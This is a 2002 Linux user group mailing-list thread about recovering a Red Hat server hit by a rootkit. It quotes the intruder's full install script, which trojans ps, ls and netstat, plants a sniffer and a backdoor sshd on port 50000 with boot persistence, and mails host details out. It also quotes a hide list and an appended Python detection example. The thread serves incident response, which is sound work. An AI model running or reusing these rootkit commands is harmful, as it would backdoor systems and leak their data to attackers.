2 mbps with abuse.zone.ro, let's say.. /me

At 01:08 PM 5/25/02 -0700, you wrote:
>Hello paul,
>
>One good thing at least: you gave me the mail address. Whoever else has
>rootkits, send in the e-mails where the info about the server gets sent.
>That way we get rid of them a bit :)
>
>Gushterul
>P.S. By the way, how about a web page with all of them? Not to put rk there,
>but info, so a guy knows whom to whack over the head. Let me rephrase: who
>does hosting? :)
>
>Friday, May 24, 2002, 11:38:02 PM, you wrote:
>
>pzeur> Reinstall everything, then register with rhn_register at rh network and
>pzeur> once you've enrolled your system with them you can use "up2date -u" for
>pzeur> up-to-date updates. Looks like wingoz but works fine.
>pzeur> If you have problems with the connection, let it fetch the headers, which
>pzeur> it puts in /var/spool/up2date (you have about 200 mb of updates to
>pzeur> download), look for a nearby mirror of updates.redhat.com
>pzeur> (e.g. ftp.ubbcluj.ro), fetch from there the packages matching the headers,
>pzeur> put them in /var/spool/up2date and restart "up2date -u".
>
>
>pzeur> my wu-ftpd from rh7.2 got holed too, but the rootkit was for another
>pzeur> system, so I found it after about 3 hours (I was waiting for "up2date -u"
>pzeur> to finish with the services running, ox that I was :) when ps, ls, netstat
>pzeur> stopped working. so I quickly brought those apps over from another
>pzeur> system, and surprise... nfsd -q -p 50000 which was a modified sshd. I
>pzeur> looked through the directories and found in /var/ftp/ a directory that
>pzeur> wasn't there last time I looked. Searching through the files in it I came
>pzeur> across a path to some library directory where there was roughly this:
>pzeur> .
>pzeur> ..
>pzeur> .lib
>pzeur> .tooz
>
>pzeur> in .tooz was the file install:
>pzeur> #private version from cur / not hacked by lamme assz as Em|nem or others!
>pzeur> #phear my reverge all u mother fuckers
>pzeur> # rk made ONLY 4 my friends ond ONLY 4 fun
>pzeur> #!/bin/sh
>pzeur> unset HISTFILE
>pzeur> chattr -iau /usr/src/linux/arch/alpha/lib/.lib/
>pzeur> chattr -iau /bin/ps
>pzeur> chattr -iau /bin/ls
>pzeur> chattr -iau /bin/netstat
>pzeur> chattr -iau /bin/lpd
>pzeur> rm -rf /etc/ssh*
>pzeur> clear
>pzeur> mkdir -p /usr/src/linux/arch/alpha/lib/.lib
>sh sysinfo1 >> new-host
>pzeur> sh ssh_random_key
>pzeur> mv .1proc /usr/src/linux/arch/alpha/lib/.lib/
>pzeur> mv .1addr /usr/src/linux/arch/alpha/lib/.lib/
>pzeur> mv .1file /usr/src/linux/arch/alpha/lib/.lib/
>pzeur> mv /bin/ps /usr/src/linux/arch/alpha/lib/.lib/.ps
>pzeur> mv /bin/ls /usr/src/linux/arch/alpha/lib/.lib/.ls
>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1proc
>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1addr
>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1file
>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ps
>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ls
>pzeur> mv ps /bin/ps
>pzeur> mv ls /bin/ls
>pzeur> mv /bin/netstat /usr/src/linux/arch/alpha/lib/.lib/
>pzeur> mv netstat /bin/netstat
>pzeur> chown root.root /bin/ls
>pzeur> chown root.root /bin/ps
>pzeur> chown root.root /bin/netstat
>pzeur> mv linsniffer /bin/lpd
>pzeur> rm -rf /etc/ssh*
>pzeur> rm -rf /usr/man/man8/rpc.rstatd.8
>pzeur> rm -rf /usr/sbin/rpc.rstatd
>pzeur> rm -rf /usr/sbin/rpc*
>pzeur> lpd &
>pzeur> ./lpd
>pzeur> mv sshd /bin/nfsd
>pzeur> mv -f sshd_config /etc/
>pzeur> mv -f ssh_host_key /etc/
>pzeur> mv -f ssh_random_seed /etc/
>pzeur> mv -f ssh_host_key.pub /etc/
>pzeur> rm -rf ssh_random_key
>pzeur> chattr +iau /bin/nfsd
>pzeur> chattr +iau /etc/sshd_config
>pzeur> chattr +iau /etc/ssh_host_key
>pzeur> chattr +iau /etc/ssh_random_seed
>pzeur> chattr +iau /etc/ssh_host_key.pub
>pzeur> nfsd -q -p 50000
>pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/rc.sysinit
>pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/init.d/inet
>./sysinfo1 >> new-host |mail -s "root6666" [EMAIL PROTECTED]
>pzeur> cat new-host |mail -s
>pzeur> #-----done with ssh----
>pzeur> killall -9 portmap
>pzeur> killall rpc.statd
>pzeur> rm -f /usr/sbin/rpc.statd
>echo "ftp">>>/etc/ftpusers
>echo "root">>>/etc/ftpusers
>pzeur> cat /proc/cpuinfo
>pzeur> mv pwd /dev/capi20.20
>pzeur> rm -f sysinfo1
>pzeur> rm -f sysinfo
>pzeur> rm -f new-host
>pzeur> rm -f sshd
>pzeur> cd ..
>pzeur> rm -rf s.tgz
>pzeur> clear
>pzeur> echo "****************************7.1***************************"
>pzeur> echo "Oki"
>pzeur> echo "***********************SpUrKaTu&TrUnKS********************"
>
>
>pzeur> there was also a file .1addr:
>pzeur> 2 194.105
>pzeur> 3 6666
>pzeur> 3 6667
>pzeur> 3 54789
>pzeur> 3 31337
>pzeur> 3 6668
>pzeur> 3 6669
>pzeur> 3 6666
>pzeur> 2 194.102.233
>pzeur> 2 209.142.209.161
>pzeur> 2 217.10
>pzeur> 2 213.233
>
>
>pzeur> I kept the files, because you never know; among them there are also:
>pzeur> hideps install lpd sense string tcp.log utils wipe
>pzeur> .1addr .1file .1proc .ls netstat .ps
>
>pzeur> that's about what I found
>
>pzeur> in general it's good to have original copies of ls, ps, netstat
>
>pzeur> good luck
>
>
>pzeur> On Fri, 24 May 2002, Gabriel Stoicea wrote:
>
> >> I'm running an RH 7.2 system on which I've detected an intrusion.
> >> I realised this because certain commands weren't working correctly.
> >> 1. I repaired the compromised packages (net-tools, fileutils and procps) with
> >> rpm -U --force ...
> >> 2. I downloaded chkrootkit, and chkproc tells me there are 2 hidden
> >> processes running:
> >> - You have 1 process hidden for readdir command
> >> - You have 1 process hidden for ps command
> >> 3. chkrootkit "freezes" during the check at the position
> >> Checking 'aliens'...
> >> 4. When I reboot the PC it gives me some errors when unmounting the /usr partition
> >> --> Illegal seek
> >> 5. When I boot, a few messages appear saying that some program is shareware
> >> and I don't know what... and that it listens on port 7000
> >> 6. In boot.log the following line appears
> >> ... Starting backdoor daemon... Done, pid=...
> >> Now I ask you:
> >> - could other packages be compromised besides the ones named?
> >> - what's with those hidden processes and how do I get rid of them?
> >> - why does chkrootkit freeze?
> >> - if it really is a backdoor, how do I get rid of it?
> >>
> >> Hoping I'm not "annoying" you with such a long mail, thank you in advance
> >> for the help.
> >> Gaby
> >>
> >>
> >> ---
> >> To unsubscribe, send mail to
> >> [EMAIL PROTECTED] with the subject 'unsubscribe rlug'.
> >> RULES, archives and other information: http://www.lug.ro/mlist/
> >>
> >>
>
>
>--
>Best regards,
> Gushterul mailto:[EMAIL PROTECTED]
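An added example, not code from the list or from the rootkit pzeur describes: since the replaced netstat on such a box cannot be trusted, a responder can decode /proc/net/tcp directly and check each socket against a ".1addr"-style hide list to see which entries the trojaned binary would have concealed. The rule semantics (type 2 = hide by address prefix, type 3 = hide by port) and the sample socket table are assumptions constructed for this example.

```python
import socket
import struct

# Hide list in the ".1addr" style quoted in the thread. Rule semantics are an
# assumption for this example: type 2 hides by address prefix, type 3 by port.
HIDE_LIST = "2 194.102.233\n3 6667\n3 31337\n2 209.142.209.161\n"
# Constructed /proc/net/tcp sample (x86 layout: little-endian hex IPv4, hex port).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1201 1
   1: 00000000:C350 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1202 1
   2: 0AE966C2:7A69 A1D18ED1:1A0B 01 00000000:00000000 00:00000000 00000000     0        0 1203 1
   3: 0100007F:0050 0100007F:9A21 01 00000000:00000000 00:00000000 00000000     0        0 1204 1
"""

def decode_endpoint(field):
    """'0AE966C2:7A69' -> ('194.102.233.10', 31337); /proc stores IPv4 in host byte order."""
    addr_hex, port_hex = field.split(":")
    return socket.inet_ntoa(struct.pack("<I", int(addr_hex, 16))), int(port_hex, 16)

def parse_proc_net_tcp(text):
    """Return (local_ip, local_port, remote_ip, remote_port, state_hex) per socket line."""
    sockets = []
    for line in text.splitlines()[1:]:  # first line is the column header
        fields = line.split()
        if len(fields) >= 4:
            sockets.append(decode_endpoint(fields[1]) + decode_endpoint(fields[2]) + (fields[3],))
    return sockets

def parse_hide_list(text):
    """Turn '2 194.102.233' style lines into (rule_type, value) tuples; skip malformed lines."""
    rules = []
    for parts in (ln.split() for ln in text.splitlines()):
        if len(parts) == 2 and parts[0].isdigit():
            rules.append((int(parts[0]), parts[1]))
    return rules

def matches_rule(sock, rule):
    lip, lport, rip, rport, _ = sock
    kind, value = rule
    if kind == 2:  # address prefix on octet boundaries, so "194.10" does not match 194.105.x.x
        return any(ip == value or ip.startswith(value + ".") for ip in (lip, rip))
    if kind == 3:  # port number, on either end of the connection
        return value in (str(lport), str(rport))
    return False

def hidden_sockets(proc_text, hide_text):
    """Sockets present in /proc/net/tcp that the hide list tells a trojaned netstat to drop."""
    rules = parse_hide_list(hide_text)
    return [s for s in parse_proc_net_tcp(proc_text) if any(matches_rule(s, r) for r in rules)]
```

On a live box, read the real /proc/net/tcp with a known-good shell and compare the result with what the suspect netstat prints; every socket the script reports is one the binary should have shown but did not.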
